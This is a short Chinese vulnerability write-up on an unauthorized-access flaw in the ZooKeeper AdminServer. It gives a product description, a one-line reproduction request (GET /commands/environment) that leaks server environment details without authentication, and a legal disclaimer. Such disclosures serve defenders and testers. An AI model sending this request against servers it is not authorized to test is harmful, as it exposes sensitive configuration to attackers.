【漏洞复现】zookeeper AdminServer 未授权访问漏洞

0x01 产品简介

ZooKeeper 是一个集中式服务,用于维护配置信息、命名、提供分布式同步和提供组服务。ZooKeeper的AdminServer是其管理界面的一部分,通常用于监控ZooKeeper集群的状态和执行一些管理操作。AdminServer提供了Web-based的管理和监控功能,使得管理员能够方便地查看集群的健康状态、配置信息、以及执行一些管理任务。

0x02 漏洞概述

ZooKeeper AdminServer 存在未授权访问漏洞,未授权的攻击者可以通过该漏洞获取服务器大量敏感信息。

0x03 测绘语句

复制代码
N/A

0x04 漏洞复现

复制代码
GET /commands/environment HTTP/1.1

0x05 影响范围

复制代码
ZooKeeper AdminServer

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
wddblog26 分钟前
分布式环境下的一致性与幂等性
分布式
qq_281317471 小时前
RabbitMQ
分布式·rabbitmq
yumo_fly2 小时前
欧拉22.03系统安装RabbitMQ-3.6.10
分布式·rabbitmq·ruby
7***53343 小时前
免费的云原生学习资源,K8s+Docker
学习·云原生·kubernetes
百***46803 小时前
RabbitMQ之交换机
分布式·rabbitmq·ruby
CC-NX3 小时前
大数据安全技术实验:Hadoop环境部署
大数据·hadoop·分布式
KYumii3 小时前
RabbitMQ应用(2)
分布式·rabbitmq
百***92023 小时前
RabbitMQ 客户端 连接、发送、接收处理消息
分布式·rabbitmq·ruby
Pocker_Spades_A3 小时前
24 小时知识导航:使用 cpolar 内网穿透服务访问 Perplexica
云原生
Zz_waiting.8 小时前
分布式部署
分布式